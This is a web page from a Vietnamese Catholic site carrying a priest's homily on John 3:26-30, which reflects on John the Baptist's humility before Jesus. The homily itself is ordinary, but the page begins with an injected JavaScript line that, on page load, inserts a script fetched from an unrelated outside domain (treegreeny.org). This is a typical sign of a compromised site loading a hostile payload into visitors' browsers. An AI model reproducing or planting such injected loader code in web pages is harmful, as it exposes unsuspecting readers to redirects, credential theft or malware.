;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NGƯỜI PHẢI NỔI BẬT LÊN CÒN TÔI PHẢI LU MỜ ĐI – Xitô PS

NGƯỜI PHẢI NỔI BẬT LÊN CÒN TÔI PHẢI LU MỜ ĐI

SUY NIỆM THỨ 7 SAU LỄ HIỂN LINH

GA 3, 26-30

  1. Bối cảnh: Sau dịp mừng lễ Vượt Qua (Ga 2, 13-3, 21), Đức Giêsu và các môn đệ đi tới miền Giu đê, nhận thấy nhiều người tin theo lời Người giảng dạy mỗi ngày một đông, nên Ngài truyền cho các môn đệ làm phép rửa cho dân chúng như họ khát mong. Trong khi đó, ông Gioan Tẩy Giả cũng đang làm phép rửa tại Enon gần Salim, vì ở đó có nhiều nước và người ta thường đến chịu phép rửa. Lúc ấy, ông Gioan chưa bị tống giam.
  2. Suy niệm: Đã rõ, trước kia, khởi đầu sứ vụ, ông Gioan Tẩy Giả với tư cách là Tiền Hô của Đấng Thiên Sai, đã kêu mời dân chúng: “Anh em hãy ăn năn sám hối”. Đó là điều kiện tiên quyết của việc sửa sang đường lối Chúa…Hưởng ứng lời mời gọi ấy, dân chúng thuộc mọi tầng lớp xã hội đã lũ lượt từ Giêrusalem và khắp miền Giu đê cùng vùng ven sống Gio đan tuôn đến với ông để thú tội và được ông làm phép rửa cho họ.
  • Vốn là người đầy khiêm tốn và trung thực, ông Gioan Tẩy Giả thấy một số người thuộc phái Pharisiêu và Sa đốc cùng đến chịu phép rửa, nhưng có lẽ họ không thực tâm thống hối, lại còn tự hào mình là con cháu tổ phụ Abraham và vênh vang tự cho mình là những người công chính, nên ông đã nghiêm nghị khuyến cáo: “Hỡi nòi rắn độc kia! Ai đã chỉ cho các anh trốn cơn thịnh nộ của Thiên Chúa sắp giáng xuống. Các anh hãy sinh hoa quả để chứng tỏ lòng sám hối…cái rùi đã đặt sát gốc cây, bất cứ cây nào không sinh quả tốt đều bị chặt đi và quăng vào lửa” (Mt 3, 1-10)
  • Thứ đến, ông Gioan cũng cho dân chúng biết rõ vai trò và sứ vụ của ông: “Phần tôi, tôi làm phép rửa cho anh em trong nước để giục lòng anh em sám hối. Còn Đấng đến sau tôi, thì quyền thế hơn tôi, tôi không đáng xách dép cho Người, Người sẽ làm phép rửa cho anh em trong Thánh Thần và lửa” (Mt 3, 11). Quả thực ông là một con người đầy khiêm tốn, và trung thực đã nói rõ cương vị và sứ vụ của mình, vì đã có những dư luận lầm tưởng ông là Đấng Cứu Thế, nhưng ông đã thẳng thừng tuyên bố với mọi người và cả phái đoàn từ Giêrusalem đến phỏng vấn:

Tôi không phải là Đấng Kitô!

Tôi là tiếng người hô trong hoang địa.

Tôi không đáng cởi quai dép cho Đấng đến sau tôi, nhưng cao trọng hơn tôi, đang ở giữa các ông mà các ông không biết (xGa 1, 20-27).

  • Một lần khác khi ông Gioan Tẩy Giả còn đang thơ thẩn đứng với hai người trong nhóm môn đệ của ông, chợt thấy Đức Giêsu đi ngang qua, ông cũng tế nhị lên tiếng: “Đây là Chiên Thiên Chúa”. Hai môn đệ vừa nghe ông nói, họ liền cáo biệt thầy mình mà đi theo Đức Giêsu (Ga 1, 35-37).
  • Một dịp khác nữa: Tin Mừng Gioan giới thiệu: “Có một người được Thiên Chúa sai đến, tên ông là Gioan, ông đến để làm phép rửa và làm chứng về ánh sáng, để mọi người nhờ ông mà tin, ông không phải là ánh sáng, nhưng ông đến để làm chứng về ánh sáng. Ngôi Lời là Ánh Sáng thật, Ánh Sáng đến thế gian và chiếu soi mọi người. Người ở giữa thế gian và thế gian đã nhờ Người mà có, nhưng lại không nhận biết Người…Những ai đón nhận, tức là những ai tin vào danh Người thì Người cho họ quyền trở nên con Thiên Chúa (Ga 1, 6.10.12).

Ông Gioan làm chứng về Người ông tuyên bố: Đây là Đấng mà tôi đã nói: Người đến sau tôi, nhưng trổi hơn tôi vì có trước tôi. Từ nguồn sung mãn của Người, tất cả chúng ta đã lãnh nhận hết ơn này đến ơn khác (Ga 1, 15-16).

  • Và hôm nay có một cuộc tranh luận xảy ra giữa các môn đệ của ông Gioan Tẩy Giả và một số người Do Thái về việc thanh tẩy. Họ đến gặp ông Gioan và nói: “Thưa Thầy, người trước đây đã ở với thầy bên kia sông Gio đan và được thầy làm chứng cho, bây giờ ông ấy cũng đang làm phép rửa, và thiên hạ đều đến với ông (Ga 3, 25-25). Đây là cơ hội cho ông Gioan Tẩy Giả làm chứng về sứ vụ Cứu Thế của Đức Giêsu. Ông đã tế nhị trả lời: “Chẳng ai có thể nhận được gì mà không do trời ban”. Ông Gioan đã xác định mọi điều tốt lành đều bởi Thiên Chúa ban cho. Vậy việc Đức Giêsu làm phép rửa và ảnh hưởng đến sự tín nhiệm của dân chúng đông đảo, chứng tỏ thế giá của Ngài. “Chính anh em làm chứng cho Thầy là thầy đã nói: “Tôi đây không phải là Đấng Kitô mà kẻ được sai đi trước mặt Ngài. Để làm chứng về Đức Giêsu và xác định thân thế cao cả của Ngài, ông đã tự nhận mình chỉ là người dọn đường cho Chúa mà thôi. Khiêm tốn, chân thật, trong sáng không muốn che lấp sự thành công của Đức Giêsu, ông Gioan còn tỏ ra vui mừng trước sự kiện đó: “Ai cưới cô dâu, người ấy là chú rể. Còn người bạn của chú rể đứng đó mà nghe chàng, thì vui mừng hớn hở vì được nghe tiếng nói của chàng” (Ga 3, 29).

Để giải thích rõ về xác quyết trên, Gioan đã dựa vào truyền thống lâu đời trong Cựu Ước để giới thiệu Chúa như vị hôn phu của nhân loại (Hs 2, 21, Ed 16, 8; Is 62, 4)- Truyền thống này cũng được sử dụng lại trong toàn bộ Tân Ước (2Cr 11, 2; Ep 5, 25; Kh 21, 2; 22, 17).

Theo tục lệ Do Thái, người phù rể đứng ra tổ chứng đám cưới. Đến ngày rước dâu, người phù rể, để chính chàng rể làm chủ đám cưới, và phù rể trở thành người giúp việc. Sự trụt xuống địa vị thấp kém chẳng những không làm cho người phù rể buồn mà còn coi đó là một vinh dự và vui mừng vì đã hoàn tất được vai trò phù rể của mình. Gioan giới thiệu Đức Giêsu là chàng rể trong tiệc cưới mà tiệc cưới được hiểu như thời cứu độ. “Đó là niềm vui của thầy, niềm vui ấy bây giờ đã nên trọn vẹn là được nghe tiếng nói của Ngài. Ngài phải nổi bật lên, còn tôi phải lu mờ đi” (xGa 3, 26-30).

 

LM PHÊRÔ KHOA-LÊ TRỌNG NGỌC

You May Also Like

Trả lời

X